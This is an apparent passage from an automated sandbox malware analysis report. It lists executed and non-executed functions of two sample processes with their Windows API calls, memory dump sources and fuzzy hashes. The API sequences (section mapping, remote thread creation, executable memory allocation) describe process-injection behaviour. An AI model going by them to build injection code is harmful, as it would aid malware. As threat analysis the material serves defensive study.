Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 79D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9180C7B0954046E5

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 0273447D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027344CE

Memory Dump Source

Source File: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_272d000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ef1cee89b4c186d830c0bd5321622a7d0122fac7c53fc1a956cdee7184bf570f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 8E113C79A00208EFDB01DF98C989E99BBF5EF08351F058094F9489B362E371EA50DF80

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Non-executed Functions

Function 026E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 026E0966
., xrefs: 026E095F
GetProcAddress., xrefs: 026E09DC, 026E09DF, 026E09E4

Memory Dump Source

Source File: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d33365e718eb4851909870bd2a4c1d45733d9aeded6a39d49589a835823d026a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: FE3136B6901609DFDB10CF99C884AAEBBF9FF58324F14504AD842B7350D7B1EA45CBA4

Function 00403303 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

s, xrefs: 00403351

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: 7d3c3ce7d3afba53949f3101cb60b44846bd025365009127c15774e8dca51465
Instruction ID: 5afa081ff343264043dcfbda8b58133b4e5669bbf4e50a190628dcd63bcb2a11
Opcode Fuzzy Hash: 7d3c3ce7d3afba53949f3101cb60b44846bd025365009127c15774e8dca51465
Instruction Fuzzy Hash: 81318B62A1C6C19FC7164F254825A6A7F685A13302B2900FFD442BB2E3D73D9B03939F

Function 004020E7 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

j1, xrefs: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID: j1
API String ID: 0-4002328062
Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760

Function 004020B8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337

Function 0273409B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_272d000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 14ee521ef3a53f931fc6f32b5a4f9f3c0aff42116899eddf9f2b9303b3acbd49
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 2E11A172340500AFD759DF95DCD1FA673EAEB99320B2980A5ED04CB316E676EC41CB60

Function 004020B6 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367

Function 004020C4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751

Function 026E0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8184fe419887a895b5f967bfc8e837201a15083de4d3b503441f0ebb32cc3d0a
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C801A276A126048FDF21DF24C804BAE33E9EB86316F4544B5D90BE7385E7B4A9418F90

Function 004020E3 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711

Function 004020FC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760

Function 004025DD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288

Function 00402285 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction ID: de7e959eacdc078ffa18660aebfbf422b397b465e6f902e3b5059cef9d8e7c6e
Opcode Fuzzy Hash: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction Fuzzy Hash: 6EF0273944D2488EDB15DF35D2D16BEFF71BE5321076A145CC5C70B102EA200248CBA0

Function 0040267C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043

Function 004026DC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction ID: 99d9351f112c3ed816393754bebdd5c910e51bb06e2b48d37259af443894e6f8
Opcode Fuzzy Hash: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction Fuzzy Hash:

Analysis Process: jjistfrPID: 5672, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	39.3%
Signature Coverage:	0%
Total number of Nodes:	84
Total number of Limit Nodes:	4

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 0256003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0256024D

Strings

cess, xrefs: 0256018D
kernel32.dll, xrefs: 0256008F, 02560095

Memory Dump Source

Source File: 00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2560000_jjistfr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8748816e91601d01a212cc8ca78b5fd4f6328feed49940da2d66e1e2c91ee6a8
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 43525874A01229DFDB64CF58C984BA8BBB1BF09314F1480D9E94DAB391DB30AE85DF14

Function 025943DE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02594406
Module32First.KERNEL32(00000000,00000224), ref: 02594426

Memory Dump Source

Source File: 00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_258d000_jjistfr.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 285cb1c673b394a8d9b7196ac6dbc0dbc5af44fa1a78dee925d2a4b051ecb24e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 8AF096351007116BDB203BF5A98DBAE76E8FF49728F100538E656D14C0DB70EC464B65

Function 02560E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02560223,?,?), ref: 02560E19
SetErrorMode.KERNELBASE(00000000,?,?,02560223,?,?), ref: 02560E1E

Memory Dump Source

Source File: 00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2560000_jjistfr.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 28b5f1fce6c579d886385c532f99378ce88ba66a548b13f3c04ec17d3950e732
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6FD0123154512877D7102AD4DC0DBDD7F1CEF05B66F008011FB0DD9080C770994046E9

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
